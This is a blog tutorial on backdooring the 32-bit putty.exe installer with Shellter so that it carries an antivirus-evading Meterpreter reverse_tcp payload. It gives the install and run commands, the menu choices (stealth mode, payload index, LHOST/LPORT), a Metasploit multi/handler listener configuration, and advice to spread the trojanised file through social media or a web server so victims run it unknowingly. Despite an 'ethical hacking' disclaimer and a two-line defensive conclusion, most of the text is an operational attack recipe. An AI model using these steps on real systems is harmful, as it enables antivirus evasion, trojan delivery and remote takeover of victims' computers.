Demo 3- Exploit Windows - Shellter Tool
Introduction:
Hi there, Welcome back to HackWithV. In this article I'm going show to you how to exploit windows using metasploit framework and shellter tool.
Shellter(shellcode alter) is a tool compatible with windows and linux. It is used for shellcode insertion. It effectively re-encodes payloads to bypass antivirus software. Shellter has proved to be the first dynamic infector for PE(Portable Executable) file format of windows 32-bit applications.
Metasploit is an open-source penetration testing platform that used to find and exploit vulnerabilities.
Disclaimer: The articles provided on HackWithV is purely for informational and educational purpose only, and for those who are willing and curious to know & learn about Ethical Hacking, Security and Penetration Testing. Anytime the word "Hacking" that is used on this site shall be regarded as Ethical Hacking.
Requirements:
1. Attacker:
- OS : Kali Linux
- Internet : Yes
2. Victim:
- OS : Windows
- Internet : Yes
Steps for Exploiting:
- Download 32-bit windows application(.exe).
- Download and install shellter.
- Run the Shellter tool and generate alter windows application(.exe).
- Listen for connections using msfconsole.
- Now share and run the generated windows application in Target Machine(Windows).
Note: This attack is performed in a local area network(LAN). The Attacker Machine and Target Machine are connected to the same network.
1. Download 32-bit Windows Appliaction:
- For time being, here I'm downloading 32-bit putty.exe application. You can download it by clicking here (putty.exe).
2. Download and Install Shellter:
- In Kali-Linux, to install shellter package use the following commands.
# apt-get install shellter
- To run the shellter in kali linux, it requires wine32 package. To install wine32 package use the following command.
# apt-get install wine32
3. Run Shellter and Generate Appliaction:
- To run shellter tool, use the following command.
# shellter
- It open a wine32 window as shown in the SS.
- It asks for operation mode, select auto(i.e, A) and asks for PE target, give the location of file putty.exe(ex: /root/Downloads/putty.exe) as shown in the SS.
- Wait for some time it creates a DisASM.dll file as shown in the SS.
- Then it asks for enable stealth mode, press Y as shown in the SS.
- Then it asks for use a listed payload or custom?, press L, asks select paylaod by index, press 1 as show in the SS.
- Then it asks for LHOST and LPORT. You can get LHOST value(i.e, local IP adddress) using ifconfig command in terminal. Give that LHOST value(ex:192.168.0.16) and LPORT as random(ex: 3535) as show in the SS.
- Wait for 1-2mins it creates a shellcode with LHOST&LPORT values and this shellcode is injected into putty.exe as shown in the SS.
4. Listen for Connections (msfconsole):
- First start the start postgresql and the start msfconsole by the following commands.
# service postgresql start
# msfconsole
- Set all values as given below
msf> use exploit/multi/handler
msf> set PAYLOAD windows/meterepreter/reverse_tcp
msf> set LHOST <local IP of Kali linux ex:192.168.0.16>
msf> set LPORT <random number, ex: 3535>
msf> exploit
- Here Listener is started and waiting for the incoming connection from the victim machine.
5. Share and Run the Payload:
- Now share the paylaod(putty.exe) to the victim via any social media platforms or by hosting in any server.
- Here I'm hosted the putty.exe in apache server and accessed and downloaded as shown in the SS.
- Now Run the putty.exe as shown in SS.
- When run the putty.exe, it runs as usual as show in SS.
- Whenever victim(windows) download and run the putty.exe, we get a meterpreter session(connection to kali machine) in Step-4 (msfconsole) as show in the SS.
- Booooom Windows is exploited.
Conclusion:
- Don't download the exe files from unknown sources.
- Monitor the system resources.
- If you have any queries, comment your queries in comment section below.
Comments
Post a Comment